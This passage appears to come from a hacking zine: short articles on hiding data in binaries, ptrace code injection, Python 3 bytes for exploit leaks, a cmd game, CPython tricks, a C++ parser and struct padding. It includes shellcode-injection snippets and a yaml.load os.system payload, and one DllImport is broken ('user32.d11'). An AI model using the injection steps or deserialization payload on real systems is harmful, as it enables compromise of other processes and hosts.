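    """Constructed minimal PE32+ layout (two sections, no real code), then `overlay`."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt = b"\0" * 0xF0                                  # optional header, contents unused here
    coff = struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, len(opt), IMAGE_FILE_EXECUTABLE_IMAGE)
    text_off, text = 0x200, b"\xC3" * 0x200             # ".text": a page of ret instructions
    data_off, data = 0x400, b"\0" * 0x200               # ".data": a page of zeros
    sec = "<8sIIIIIIHHI"                                # full 40-byte section header
    headers = (dos + b"PE\0\0" + coff + opt
               + struct.pack(sec, b".text", len(text), 0x1000, len(text), text_off, 0, 0, 0, 0, 0x60000020)
               + struct.pack(sec, b".data", len(data), 0x2000, len(data), data_off, 0, 0, 0, 0, 0xC0000040))
    image = headers + b"\0" * (text_off - len(headers)) + text + data
    return image + overlay                              # same shape as copy /b a.sfx + b.conf + c.7z


# Constructed stand-in for the 7-Zip SFX case: a config line, then an archive
# beginning with the 7z signature bytes 37 7A BC AF 27 1C.
SAMPLE_SFX = build_sample_pe(b"config=1\n" + b"7z\xbc\xaf\x27\x1c" + b"\0" * 64)
```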


Finally, you can always compile static data
into the object file and link that into the
binary. One way to do this is opening the 
file to embed in a hex editor like HxD, and 
exporting it as a .c file. Instead of rc.exe, 
compile this with your regular C compiler and 
link it with the rest of the app as usual. 


Note that unlike PE resources, using static 
data in an object file is a cross-platform 
solution. GNU binutils’ or mingw’s “objcopy” 
or “ld” can also take a regular file and save 
it as an object file which exports a symbol 
for your embedded data. That symbol can be 
referenced in your app as a static variable. 
You can use this variable, write the memory 
to disk, etc. Of course, you could encrypt, 
compress or obfuscate the data prior to 
inclusion in your application. 


Unknown apps with large read-only data 
sections or .data sections that appear to 
contain executable code should be suspected 
for holding some sort of payload using this 
technique! 


github.com/docandrew 
- Watch ace hackers solve pwnable challenges in a four player race live on YouTube
- Listen to commentary and insightful analysis to learn the best exploitation tricks
- Think you are up to the task? Solve the community challenge and participate yourself!

Information and schedule: https://pwny.racing

Community Advertisement

How do I start with reverse engineering?
Starting off with reverse engineering is challenging, to say the least.
There are numerous blogs freely available online which show certain
techniques, but nearly all of them use proprietary tools. For this reason,
I decided to create my own Binary Analysis Course¹ where the focus is on
the how and why, in combination with free tooling. Starting from June
2018, I published an array of articles, starting off at the very beginning
and ending at known malware families such as Emotet or Magecart.

The course is, and will remain, free for anyone to use in the future. If
you have feedback or questions about the course or about reverse
engineering in general, feel free to reach out to me on @LibraAnalysis² on
Twitter!

¹ https://maxkersten.nl/binary-analysis-course/
² https://twitter.com/LibraAnalysis


Introduction to ptrace 
- injecting code into a 
running process 


Injecting code into a running program can have 
many use cases, from widely defined malware, 
runtime patches of the process that cannot be 
stopped, up to the topic of debuggers and reverse 
engineering frameworks. They all need access to 
the state of the execution of another process, with 
ability to read/write values from memory or 
registers. 


On Linux such ability to debug another process is 
provided by a system call named ptrace. It allows 
any program (called “tracer”) to observe and 
modify state of another process attached to it 
(“tracee”) via number of requests. 

#include <sys/ptrace.h> 

long ptrace(enum __ptrace_request request, 
pid_t pid, void *addr, void *data); 

One thing to note is that although arguments to
ptrace are interpreted according to the prototype,
glibc currently declares ptrace as a variadic
function with only the request argument fixed. It is
still recommended to use all four arguments,
setting unused ones to 0L or (void *) 0.


In order to start debugging an already running 
program, we have to send a PTRACE_ATTACH 
request to a target process identified by its PID 
(Process IDentifier) value. After that the tracee will 
receive SIGSTOP signal, pausing the execution in 
its current state, for which we have to wait in 
tracer program. 

ptrace(PTRACE_ATTACH, pid, NULL, NULL);
wait(NULL);

At this moment, we're ready to mess around with
the state of the process we're attached to. We can
get values of registers into a structure called
user_regs_struct defined in the <sys/user.h>
header.

struct user_regs_struct old_regs; 
ptrace(PTRACE_GETREGS, pid, NULL, 
&old_regs); 

Having that information and an ability to set the 
values of registers in a process, we can change the 


flow of execution by modifying the RIP (EIP in x86, 
RIP on x86-64 as used in this example) register. 


But before doing anything, let’s think about where 
we would place our code in memory. One way to 
do it would be to parse /proc/PID/maps file and 
look for sections containing permissions to 
execute. 

~> cat /proc/12862/maps
556e40ee8000-556e40ee9000 r--p 00000000 08:01 918642 /home/w3ndige/sample_process
556e40ee9000-556e40eea000 r-xp 00001000 08:01 918642 /home/w3ndige/sample_process

In this example, the second section from the truncated
maps output would be the way to go: we have
matching permissions ("r-xp") and an address
range where we would be able to write our code
(556e40ee9000-556e40eea000). Even though
writing a parser for the maps file is really easy, you can
also use different techniques - overwriting code
from the address stored in RIP is another trivial
technique. On the other hand, we can try to find a
code cave in a process memory and inject code in
it.
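The maps parser mentioned above, as an added example (not the article's PoC): each line becomes a record, the executable regions are picked out, and, from a defender's side, regions that are both writable and executable are flagged, since injected code tends to live in exactly such mappings. The two sample lines from the article are kept and the other three are constructed.

```python
# Added example (not the article's PoC): parse /proc/PID/maps and select
# regions by permission. Sample input is constructed below.
import re
from dataclasses import dataclass
from typing import List

MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+"
    r"(?P<perms>[rwxsp-]{4})\s+(?P<offset>[0-9a-f]+)\s+"
    r"(?P<dev>[0-9a-f]+:[0-9a-f]+)\s+(?P<inode>\d+)\s*(?P<path>.*)$"
)


@dataclass
class Region:
    start: int
    end: int
    perms: str
    path: str

    def executable(self) -> bool:
        return "x" in self.perms

    def writable(self) -> bool:
        return "w" in self.perms

    def size(self) -> int:
        return self.end - self.start


def parse_maps(text: str) -> List[Region]:
    """Parse the text of /proc/PID/maps; raises on a line it does not understand."""
    regions = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = MAPS_LINE.match(line)
        if m is None:
            raise ValueError(f"unexpected maps line: {line!r}")
        regions.append(Region(int(m["start"], 16), int(m["end"], 16),
                              m["perms"], m["path"].strip()))
    return regions


def executable_regions(text: str) -> List[Region]:
    """Regions with "x" in their permissions, e.g. the r-xp mapping of the binary."""
    return [r for r in parse_maps(text) if r.executable()]


def wx_regions(text: str) -> List[Region]:
    """Writable-and-executable regions: uncommon outside JIT runtimes, so worth flagging."""
    return [r for r in parse_maps(text) if r.executable() and r.writable()]


# Constructed sample: the two lines from the article plus three made-up ones
# (an anonymous heap mapping, the stack, and an anonymous rwx mapping).
SAMPLE_MAPS = """\
556e40ee8000-556e40ee9000 r--p 00000000 08:01 918642 /home/w3ndige/sample_process
556e40ee9000-556e40eea000 r-xp 00001000 08:01 918642 /home/w3ndige/sample_process
7f3a1c000000-7f3a1c021000 rw-p 00000000 00:00 0
7ffd2a3c1000-7ffd2a3e2000 rw-p 00000000 00:00 0                          [stack]
7f3a1d000000-7f3a1d001000 rwxp 00000000 00:00 0
"""
```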


Once we have a region in memory that will be
suitable for injection, we can use another ptrace
request called PTRACE_POKEDATA to write a word
(32 or 64 bits) of data (here represented by a
uint64_t array) into a specified address (long
int). Similarly to that we can read from memory
with the PTRACE_PEEKDATA request.


ptrace(PTRACE_POKEDATA, pid, addr + i * 8, 
shellcode[i]); 


So, we’ve managed to inject code into the memory 
of a process within some region. Now we have to 
come back to previously stored registers, change 
the value of RIP to the address where we placed 
our code and set registers to the process. Finally, 
after that we can continue the execution of tracee. 
old_regs.rip = addr; 
ptrace(PTRACE_SETREGS, pid, NULL, 
&old_regs); 

ptrace(PTRACE_CONT, pid, NULL, NULL); 
Remember that while tracing multithreaded 
applications, tracee is always only a single thread, 
meaning that after attaching to the process we’ll 
be actually attaching to the initial thread. Others 
will continue execution just as before. 


PoC: github.com/W3ndige/linux-process-injection 


Strings & bytes in Python 3 


You are building an exploit and, not being a barbarian,
have switched from Python 2 to 3. One part of your
exploit involves leaking an important address by dumping
a chunk of memory. This chunk of memory contains a
lot of random data but somewhere in the middle you
know that there is a string "Här: "¹ followed by the
4 bytes representing the little endian encoding of the
address you are looking for. You copy some old Python
2 code that you have used for a similar situation:

import struct

def extract_leaked_pointer(leak):
    marker = 'Här: '
    start = leak.find(marker)
    leak_start = start + len(marker)
    leak_data = leak[leak_start:leak_start+4]
    return struct.unpack('<I', leak_data)[0]


Sadly, when running this, you get the following error: 
TypeError: argument should be integer 
or bytes-like object, not 'str' 


To solve this, you try to decode the leaked bytes into 
a string by adding this line to the code: 
leak = leak.decode('utf-8') 


Unfortunately, this doesn’t work either and you are left 
staring at another error message: 


UnicodeDecodeError: 'utf-8' codec can't 
decode bytes in position 0-1: invalid 
continuation byte 


In ~~anger~~ your desire to develop as a hacker, you turn to
~~Twitter and complain about how Python 3 sucks~~ this
article to understand how to reason about Python 3,
strings, character encodings and arbitrary bytes.

The problem is that you are trying to interpret an ar- 
bitrary sequence of bytes as UTF-8 encoded data. This 
is the equivalent of trying to push a square peg through 
a round hole. It won’t work. The following diagram 
shows what you are trying to do and where it goes 
wrong. 


[Diagram: the Python 2 approach applied to Python 3 types]
  bytes  "...\x48\xC3\xA4\x72: \xBE\xBA\xFE\xCA..."
    | UTF-8 decode
    v
  Error
  (intended path: string -> find marker -> extract bytes "\xBE\xBA\xFE\xCA"
   -> little endian -> int 0xCAFEBABE; legend: string / bytes / int)

¹ Swedish for "here"
Let's remind ourselves about character encodings. The
goal is to represent a character such as "A". Computers
work with numbers (more precisely bits), not characters,
so we translate the character into a number. In
the ASCII encoding, this is the number 65. We call this
the codepoint. This value is then encoded using a single
byte 0x41. This is simple in ASCII because there is a
one-to-one-to-one mapping between characters, codepoints
and bytes, and this can be done implicitly without
thinking about it. Python strings are not limited
to ASCII but can represent the full Unicode range. If
we use the UTF-8 encoding and take the character ä
we instead get:


Character | Codepoint | Bytes     | Encoding
A         | 65        | 0x41      | ASCII
A         | 65        | 0x41      | UTF-8
ä         | 228       | 0xC3 0xA4 | UTF-8


Specifically, one character maps to a codepoint which
is encoded with more than one byte, and not every
sequence of bytes represents a valid character. This is
what causes the problem. To solve this, instead of trying
to convert the "haystack" bytes into a string and
search for a substring, you convert the "needle" marker
into a sequence of UTF-8 bytes and search for that
sequence of bytes in the haystack. When it is found,
you can extract bytes relative to that offset and process
them accordingly, in this case, convert them to a 32-bit
number. This slightly modified diagram describes this
approach.
[Diagram: the bytes-first approach]
  string "Här: "
    | UTF-8 encode
    v
  bytes "\x48\xC3\xA4\x72: "
    | find marker in bytes "...\x48\xC3\xA4\x72: \xBE\xBA\xFE\xCA..."
    v
  extract bytes "\xBE\xBA\xFE\xCA"
    | little endian
    v
  int 0xCAFEBABE
  (legend: string / bytes / int)
Which, translated to Python 3 code looks like this: 


import struct

def extract_leaked_pointer_python3(leak):
    marker = 'Här: '.encode('utf-8')
    start = leak.find(marker)
    leak_start = start + len(marker)
    leak_data = leak[leak_start:leak_start+4]
    return struct.unpack('<I', leak_data)[0]


In short, don’t try to convert bytes that don’t represent 

text, into text. Instead convert the text into bytes, use 
it to extract the relevant bytes and then process them 
accordingly. Now your exploit works in Python 3 and 
you can leave another legacy language behind. 
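The same bytes-first approach as an added example (not the article's code), with the marker and pointer width as parameters and one failure the snippet above does not handle: find() returns -1 when the marker is absent, which would otherwise slice garbage from the end of the buffer without any error. The leak it runs on is constructed.

```python
# Added example, not the article's code: bytes-first extraction with the
# missing-marker and truncated-leak cases handled explicitly.
import struct


def extract_leaked_pointer(leak: bytes, marker: str = "Här: ", width: int = 4) -> int:
    """Return the little-endian integer that follows `marker` in the raw `leak`.

    The marker is text, so it is encoded to UTF-8 and searched as bytes; the
    leak itself is never decoded, since arbitrary memory is not valid UTF-8.
    """
    needle = marker.encode("utf-8")
    start = leak.find(needle)
    if start == -1:
        raise ValueError("marker not found in leak")
    begin = start + len(needle)
    data = leak[begin:begin + width]
    if len(data) != width:
        raise ValueError("leak ends before the full pointer")
    fmt = {4: "<I", 8: "<Q"}[width]
    return struct.unpack(fmt, data)[0]


def looks_like_text(leak: bytes) -> bool:
    """Why decoding the haystack is the wrong tool: arbitrary bytes are rarely valid UTF-8."""
    try:
        leak.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


# Constructed leak: junk, the UTF-8 marker (48 C3 A4 72 3A 20), then 0xCAFEBABE
# in little-endian order, then more junk, as in the article's diagram.
SAMPLE_LEAK = b"\x00\x7f\x13\xff" + "Här: ".encode("utf-8") + b"\xbe\xba\xfe\xca" + b"\x01\x02"
```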


https://zeta-two.com 
https://twitter.com/ZetaTwo 
https://youtube.com/ZetaTwo 


CP850 cmd game in C# .NET

Meemki, a somewhat bored security researcher who
accidentally exploits and therefore shuts down a part of
the stable universe computer, is the protagonist in an
urban noir-style EASCII game. He learned a lot about the
infrastructure he discovered by using an unknown
proprietary protocol. Now he knows the universe will
destabilize, reaching an undefined state in a couple of days.
He needs to get physical access to the universe computing
infrastructure which is held by the SAOTU (Secret Alliance
of the Universe). On his way he needs to exploit all kinds
of security systems, physical as well as computer based,
and gets himself in situations he was not prepared

When starting with this Meemki project, a few constraints
were made for the sake of fun, style and challenge: run in
cmd; system libs only; graphics with CP850 chars. I used
C# .NET because it is fast to get to the point and I am
quite confident with it.

In this article, some tricks are shown which solve common 
problems with game development for cmd to get you 
started. 

First of all, we want a borderless fullscreen cmd. This can 
be achieved by utilizing WinAPI’s ConsoleApi3.h available 
through the kernel32.dll. In particular we are going to use 
the SetConsoleDisplayMode function which can be 
accessed in C# as follows: 


[DllImport("kernel32.dll")]
public static extern bool
SetConsoleDisplayMode(IntPtr hConsoleOutput,
    uint dwFlags,
    out _COORD lpNewScreenBufferDimensions);


In order to invoke it, we need the _COORD struct and a 
handle to the console screen buffer: 


[StructLayout(LayoutKind.Sequential)]
public struct _COORD
{
    public short X;
    public short Y;
    public _COORD(short x, short y)
    { X = x; Y = y; }
};

[DllImport("kernel32.dll")]
public static extern IntPtr
GetStdHandle(int nStdHandle);


Calling the functions on startup with -11 for the standard
output handle and 1 for console fullscreen mode:

_COORD coord = new _COORD();
SetConsoleDisplayMode(
    GetStdHandle(-11), 1, out coord);


...and you are done! Fullscreen borderless cmd.

Based on the keywords DllImport and the imported
function's names, you are able to dig into the topic(s)
deeper or just use the code to set up a fullscreen cmd to
get an immersive experience.

Another tricky part is the keyboard input: Open a notepad 
in Windows and press a letter on your keyboard for some 
time. You will notice a delay before the letter is 
repeatedly printed and probably a delay after releasing 
the key. This behavior is called character repeat hold time 
and delay. It is a system setting and also occurs when 
using the standard Console.ReadKey in C#. The delay is 
very impractical for games, so we need another way to 
handle keyboard input. Luckily there is a way using 
WinAPI’s winuser.h through user32.dll. The GetKeyState 
function allows us to check if a given key is down and can 
be used in C# as follows: 


[DllImport("user32.d11")] 
public static extern short GetKeyState( 
int nVirtKey); 


The returned short’s high order bit will be 1 if the nVirtKey 
is down. All that is left to do is getting the hex code for the 
key we want to check (http://msdn.microsoft.com/en- 
us/library/dd375731%28v=VS.85%29.aspx), pass it to the 


function and compare with a proper bitmask: 
if ((GetKeyState(0x27) & 0x8000) != 0)


0x27 is the right-arrow on the keyboard and the if- 
statement is true when the key is down. This way 
keystrokes feel very direct. If this solution is still too slow 
for you, have a look at the GetAsyncKeyState function 
within winuser.h which reflects the interrupt-level state of 
the keys. 

Last but not least, if you want to redraw the content of the cmd, it is worth considering double buffering to avoid the flickering/stuttering which is likely to appear when redrawing the whole screen for every frame. For Meemki a memory buffer is used and only the changes between two frames are redrawn to the screen using Console.SetCursorPosition and Console.Write.

Meemki is currently in a very early stage but if you are interested, check it out here: github.com/OxRUFF/Meemki


DISCLAIMER: The described methods may not work on all 
devices as they might depend on certain drivers. 


Christian Bohnhoff 


from cpython_exploit_ellipsis import * 


Have you ever tried using Ellipsis in Python? No? 
Then do this in your Python interpreter: 


>>> ...
Ellipsis

Boom! If you don't know what Ellipsis is for, this article won't explain it¹. We will play with Ellipsis a bit more instead. Let's begin with some magic:

>>> from cpython_exploit_ellipsis import *
>>> ..., isinstance(..., Ellipsis.__class__)
(Ellipsis, True)

The Ellipsis seems to be the same but it has two additional features. First of all, we don't have to do any explicit import statements now. We can do inline imports instead, via the Ellipsis object's __getattr__:

>>> ....antigravity
<module 'antigravity' from '/usr/lib/python3.X/antigravity.py'>

Since those are real modules, we can also call their functions. Let's see this on an example that uses the unsafe yaml.load function, which allows us to launch arbitrary code by loading a proper yaml payload:

>>> ....yaml.load(
...     "!!python/object/apply:os.system "
...     "['echo yaml.load is insecure by design :(']")
yaml.load is insecure by design :(
0

The second feature the magic gave us is the ability to get libc functions via __getitem__. This might be handy if you want to play with things like printf, scanf or other not-so-obvious functions and you are too sophisticated to put yourself in a write-compile-launch loop. Example below.

>>> ...['system']
<_FuncPtr object at 0x7f35603aa4f8>
>>> ...['rand']()
51242132
>>> ...['printf'](b'%p %p %p %p %p %p\n', id(...))
0x9bb100 (nil) 0x1be1498 0x555390 0x555421 0xa
47


That’s all. So how is it done? See for yourself by solving the puzzle below and studying the exploit code! Enjoy o/ 




¹ You might want to check out https://stackoverflow.com/questions/772124/what-does-the-python-ellipsis-object-do
https://disconnect3d.pl/
https://github.com/disconnect3d 
https://twitter.com/disconnect3d_pl 


A PARSER-GENERATOR IN 100 LINES OF C++




Please excuse the longish intro — I promise this is going somewhere!


In the past, my day job consisted of creating and maintaining a Material Flow Control System (often called MFCS) for warehouses and production plants. This necessitated connecting to various PLCs controlling the mechanical parts — from huge cranes, through conveyor belts, and all the way down to LED systems telling humans what to do.


All those systems had one particular thing in common: they 
all defined similar, but different text-based protocols to be 
used to communicate with them over TCP. In a simplified 
example, that’s how a message to a crane could be defined: 


Field name     Field type   Comment
Begin          ALPHA[1]     Character [
Message Type   ALPHA[3]     "MOV" for move crane
X To           NUM[3]
Y To           NUM[3]
End            ALPHA[1]     Character ]


Have you ever needed to implement a third-party plaintext 
protocol? It’s as simple as it’s boring. And Deity forbid if the 
documentation changes after initial implementation. You'll 
waste so much time! At least that’s what I told my boss when 
I started creating a templated declarative parser. 


To be fair, I was fairly accurate. I inherited code that used std::map<std::string, std::string>, and I wager that I wasted multiple days hunting all the typos in those strings.


Since C++ is a fairly strongly-typed language, there is no 
need for that — we should be able to leverage the type system 
to ensure that both our keys and values are correct. Let's 
discuss the API: 


* keys (field names) should be verified at compilation time — none of these pesky typos can pass here,

* values need to be of the correct type, not the all-catching std::string,

* the code should be as close as possible to the documentation. Ideally, it'd be the documentation.


For example, we could want our MOV telegram to be 
defined as follows: 


using mov = message<
    element<struct begin, char_constant<'['>>,
    element<struct message_type, text<3>>,
    element<struct x_to, number<3>>,
    element<struct y_to, number<3>>,
    element<struct end, char_constant<']'>>
>;

dev.krzaq.cc 
https://twitter.com/KrzaQ2 




The usage should be also simple. For receiving: 


auto data = socket.read();
mov m = mov::parse(data);
log << m.value<x_to>() << m.value<y_to>();


And for sending: 


mov m;
m.value<message_type>() = "MOV";
m.value<x_to>() = 13;
m.value<y_to>() = 37;
socket.send(m.to_string());


This approach is Good Enough™. We have type safety, and 
we can even extend it to use custom types. For example, the 
above will write the following to the socket (note the 
padding: zeros for numbers, text would use spaces): 
[MOV013037] 

Moving on, the internal implementation is surprisingly simple. The main class template accepts a list of key-type pairs as a variadic pack. It uses keys only to map them to values. The type has a bit more to do — each type is expected to know its length, and how to serialize and deserialize itself (or signal an error).


template<typename... Elements>
struct message
{
    static message parse(string_view buf);
    void write(char* buf, size_t size) const;
    string to_string() const;
    template<typename Key>
    constexpr auto& value();
private:
    tuple<typename d::element_value_type<
        Elements>::type...> data;
};


Class message definition — shortened and modified to fit here 


template<size_t Length>
struct number
{
    static constexpr size_t length = Length;
    using value_type =
        d::type_to_hold_number<Length>;
    static void write(value_type const& val,
                      char* buf);
    static value_type parse(string_view buf);
};

Class number definition — shortened and modified to fit here 
As of writing this article, the whole proto.hpp has 248 lines, 
and I haven’t performed any line-saving optimizations on 
the file. 
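As an added example (my C++17 code, not KrzaQ's proto.hpp), here is a minimal message<element<Key, Type>...> in the shape sketched above, with a parse() that rejects telegrams of the wrong length, bad framing, or non-digit NUM fields. Signalling errors by throwing, and the helper names build_mov/rejects, are my assumptions.

```cpp
// Added example, not KrzaQ's proto.hpp: a minimal message<element<Key, Type>...>.
// Each field type knows its length and how to (de)serialize itself; malformed input
// is signalled by throwing, which is my choice (the article leaves the mechanism open).
#include <cstddef>
#include <cstdint>
#include <stdexcept>
#include <string>
#include <string_view>
#include <tuple>
#include <type_traits>

namespace proto {

template<std::size_t Length>
struct number {                                  // NUM[Length]: decimal, zero-padded
    static constexpr std::size_t length = Length;  using value_type = std::uint32_t;
    static std::string write(value_type v) {
        std::string s = std::to_string(v);
        if (s.size() > Length) throw std::length_error("number does not fit NUM field");
        return std::string(Length - s.size(), '0') + s;
    }
    static value_type parse(std::string_view buf) {
        value_type v = 0;
        for (char c : buf) {                         // anything but ASCII digits is malformed
            if (c < '0' || c > '9') throw std::invalid_argument("non-digit in NUM field");
            v = v * 10 + static_cast<value_type>(c - '0');
        }
        return v;
    }
};
template<std::size_t Length>
struct text {                                    // ALPHA[Length]: text, space-padded
    static constexpr std::size_t length = Length;  using value_type = std::string;
    static std::string write(const value_type& v) {
        if (v.size() > Length) throw std::length_error("text does not fit ALPHA field");
        return v + std::string(Length - v.size(), ' ');
    }
    static value_type parse(std::string_view buf) { return std::string(buf); }
};
template<char C>
struct char_constant {                           // one mandatory character, '[' or ']'
    static constexpr std::size_t length = 1;  using value_type = char;
    static std::string write(value_type) { return std::string(1, C); }
    static value_type parse(std::string_view buf) {
        if (buf[0] != C) throw std::invalid_argument("unexpected framing character");
        return C;
    }
};
template<typename Key, typename Type> struct element { using key = Key; using type = Type; };

template<typename... Elements>
struct message {
    static constexpr std::size_t length = (Elements::type::length + ... + 0);
    // The telegram must be exactly as long as its definition: no trailing garbage.
    static message parse(std::string_view buf) {
        if (buf.size() != length) throw std::length_error("telegram has wrong length");
        message m;
        std::size_t offset = 0;
        ((m.template value<typename Elements::key>() =
              Elements::type::parse(buf.substr(offset, Elements::type::length)),
          offset += Elements::type::length), ...);
        return m;
    }
    std::string to_string() const {
        std::string out;
        ((out += Elements::type::write(std::get<index_of<typename Elements::key>()>(data_))), ...);
        return out;
    }
    template<typename Key> auto& value() { return std::get<index_of<Key>()>(data_); }
private:
    // Key -> tuple index at compile time: a misspelled key is a compile error, not a
    // silent lookup of a wrong string as with std::map<std::string, std::string>.
    template<typename Key> static constexpr std::size_t index_of() {
        constexpr bool hit[] = { std::is_same_v<Key, typename Elements::key>... };
        for (std::size_t i = 0; i < sizeof...(Elements); ++i) if (hit[i]) return i;
        return sizeof...(Elements);                  // out of range, rejected by std::get
    }
    std::tuple<typename Elements::type::value_type...> data_;
};

} // namespace proto

// The MOV telegram from the table above; the key structs are declared right here.
using mov = proto::message<
    proto::element<struct begin, proto::char_constant<'['>>,
    proto::element<struct message_type, proto::text<3>>,
    proto::element<struct x_to, proto::number<3>>,
    proto::element<struct y_to, proto::number<3>>,
    proto::element<struct end, proto::char_constant<']'>>>;

std::string build_mov(std::uint32_t x, std::uint32_t y) {           // sending side
    mov m;
    m.value<message_type>() = "MOV";
    m.value<x_to>() = x;
    m.value<y_to>() = y;
    return m.to_string();                                            // "[MOV013037]" for 13, 37
}

bool rejects(std::string_view data) {            // true when parse() refuses a malformed telegram
    try { mov::parse(data); return false; } catch (const std::exception&) { return true; }
}
```

The receiving side is mov::parse(data) followed by m.value<x_to>(), exactly as in the usage sketch above.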


The code may be accessed at the following address: 


https://github.com/KrzaQ/protocol_parser_generator


Rome golfing 


How do you convert, for example, 42 to base 16?

42 / 16 = 2, remainder 10 -> A
 2 / 16 = 0, remainder 2  -> 2        42 (10) = 2A (16)


Can we do the same to convert arabic numbers to 
roman? 

In the base 10 system we have units, tens, hundreds and so on... Each is ten times the previous one. But that is not the case with roman numerals:


Symbol   I   V   X   L    C    D    M
Value    1   5   10  50   100  500  1000


V is five times I, but X is two times V. Then L is five times X and C two times L. There is a pattern alternating 5 and 2. Let's try to convert 42:

42 / 5 = 8, remainder 2 -> II
 8 / 2 = 4, remainder 0 ->
 4 / 5 = 0, remainder 4 -> XXXX / XL

First divide 42 by 5 which gives 8 and remainder 2. 
So there are two symbols I. 

Next divide 8 by 2 (remember to alternate) to get 4 
and remainder 0, so no Vs there. 

Lastly dividing 4 by 5 gives terminating 0 and 
remainder 4. That gives four symbols X. 

42 is XXXXII using additive notation, but for four symbols in a row we're using subtractive notation. Thus we need to reach for the next symbol and precede it with one current symbol, giving XLII as the result.

If we look at various numbers, there are two variants requiring subtractive notation. One is like 4, subtracting from the next symbol (IV), and the other like 9, subtracting from the symbol two places further (IX). Let's look at 19:


19 divided by 5 is 3 and remainder 4. Four symbols we want to write in subtractive notation, and this is the second variant, so we reach for X and subtract I from it.

Then 3 divided by 2 gives 1 with remainder 1. That 
gives one symbol V. 

The final step is to divide 1 by 5 to get 0 and remainder 1. The last symbol is X.

XVIX is not the expected result. The problem is that IX in additive notation is VIIII, so we should have had one V less in the result. Let's try again.

19 / 5 = 3, remainder 4 -> IX    3 - 1 = 2 (one V is already used up)
 2 / 2 = 1, remainder 0 ->
 1 / 5 = 0, remainder 1 -> X

And that gave XIX :) Alternatively we can subtract one from the division result before the next step.


Taeril 


CC BY 4.0 


At the beginning of the year 2003 a small code golf challenge was posted on the usenet newsgroup pl.comp.lang.javascript. Ultimately what they produced is mind-boggling:


function rome(N,s,b,a,o){
  for(s=b='',a=5;N;b++,a^=7)
    for(o=N%a,N=N/a|0;o--;)
      s='IVXLCDM'.charAt(o>2?b+N-(N&=~1)+(o=1):b)+s;
  return s
}


Function rome takes one argument N which is the 
number to convert. Other arguments are basically just 
local variable declarations without using var keyword. 
Global variables wouldn’t be elegant. 

Resulting roman numeral is assembled in s. 

Variable b is a pointer to the currently processed symbol. It is initialized to an empty string, which treated as a number would be converted to the value 0.

Variable a is used to alternate between 2 and 5. 

Remainder — number of symbols of given type — is 
saved in variable o. 


The outer loop initializes variables and goes as long as N is not zero. After each iteration it moves to the next symbol (b++) and switches between 2 and 5 using a neat xor bit twiddling trick (a^=7).


The initialization part of the inner loop divides N by a (2 or 5) and sets o to the remainder and N to the quotient. Because JavaScript has only floats, the N/a|0 trick acts like int(N/a), discarding the fractional part.

Loop goes as long as o is greater than zero. 

The call to the charAt method on a string chooses the next symbol, which is concatenated with s.

If o is not greater than 2, the index is simply the current symbol being processed, i.e. the value of b.

Otherwise the subtractive case is handled.

Index is the current position (b) plus one (o=1) plus 
another one if N is an odd number. 

The middle part of that — N-(N&=~1) — uses a bit trick to set the least significant bit of N to 0, effectively subtracting one from odd numbers. Even values stay unchanged, so the whole expression is 1 for odd numbers and 0 otherwise.


return s — I have absolutely no idea what comment 
it warrants ;) 
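The same algorithm written out readably, as an added example in C++ (mine, not the usenet code): divide by 5 and 2 in turn, each remainder giving a run of the current symbol, with the remainder-4 case handled subtractively exactly as the golfed charAt index does.

```cpp
// Added example, not the usenet code: the alternating 5/2 algorithm in plain C++.
#include <cstddef>
#include <stdexcept>
#include <string>

std::string rome(unsigned n) {
    if (n > 3999) throw std::out_of_range("no roman numeral with I..M for this value");
    static const char symbols[] = "IVXLCDM";       // index b: I=0, V=1, X=2, L=3, ...
    std::string s;                                 // result, assembled from the right
    unsigned a = 5;                                // divisor, alternates 5, 2, 5, 2, ...
    for (std::size_t b = 0; n != 0; ++b, a ^= 7) { // a ^= 7 swaps 5 and 2
        unsigned o = n % a;                        // how many copies of symbols[b]
        n /= a;
        if (o == 4) {                              // four in a row: subtractive notation
            // If the quotient is odd, one symbols[b+1] (a V-like symbol) is pending:
            // fold it in and write the IX-like pair (b, b+2); otherwise write IV-like (b, b+1).
            unsigned skip = n & 1;
            n &= ~1u;                              // the pending V-like symbol is consumed
            s.insert(0, 1, symbols[b + 1 + skip]);
            o = 1;
        }
        s.insert(0, o, symbols[b]);
    }
    return s;                                      // "" for 0, like the golfed version
}
```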


Happy golfing 
Taeril 


Usenet discussion is archived at: https://groups.google.com/d/ 
topic/pl.comp.lang. javascript/uDJED8XeaDg 

Unfortunately it’s in Polish language. 

Great respect to Vax who was the main driving force of this 
challenge, but also to BlaTek, Coder and Krzyszt_off for participating. 
Awesome, mind blowing job! 


https://taeril.kraina.org/ 


Does order of variable 
declarations matter? 


Let’s check this in an example in C++ 


#include <iostream>

struct A {
    char a;
    char b;
    int c;
};

int main() {
    std::cout << sizeof(struct A);
}


In our structure we have two chars (2 x 1 byte) and one int (1 x 4 bytes¹). While the total size of the structure fields is 6 bytes, unexpectedly the program printed out that the structure size is "8". What happened? Let's look deeper and check the offsets of the variables. One possibility is to use GDB (version 8.1 or newer). Before that, we need to use our structure somewhere, for example by adding this simple code to the main function:


A obj;

Now, we can debug our program² with gdb --quiet [path to executable file] and then use GDB's ptype command to show the layout of the structure generated by the compiler:


(gdb) ptype /o struct A
/* offset    |  size */  type = struct A {
/*    0      |     1 */    char a;
/*    1      |     1 */    char b;
/* XXX  2-byte hole  */
/*    4      |     4 */    int c;

                           /* total size (bytes):    8 */
                         }


As you can see, there is a 2-byte gap after the char "b". It is a common practice of data alignment³ - it can improve performance in some cases, especially when you use SIMD⁴.


1. Please note that the size of int depends on the compiler and the type of architecture. In our case (x86-64) it's 4 bytes.

2. Make sure to add debug information when compiling; in g++ or clang++ pass the -g flag for that.

3. You can read more about the topic here:
https://en.wikipedia.org/wiki/Data_structure_alignment
https://stackoverflow.com/questions/4306186/structure-padding-and-packing


https://github.com/sergiuszlts 




For comparison, let's change the order of variables in our structure:

struct A {
    char a;
    int c;
    char b;
};

Again, let's check the offsets:


(gdb) ptype /o struct A
/* offset    |  size */  type = struct A {
/*    0      |     1 */    char a;
/* XXX  3-byte hole  */
/*    4      |     4 */    int c;
/*    8      |     1 */    char b;

                           /* total size (bytes):   12 */
                         }


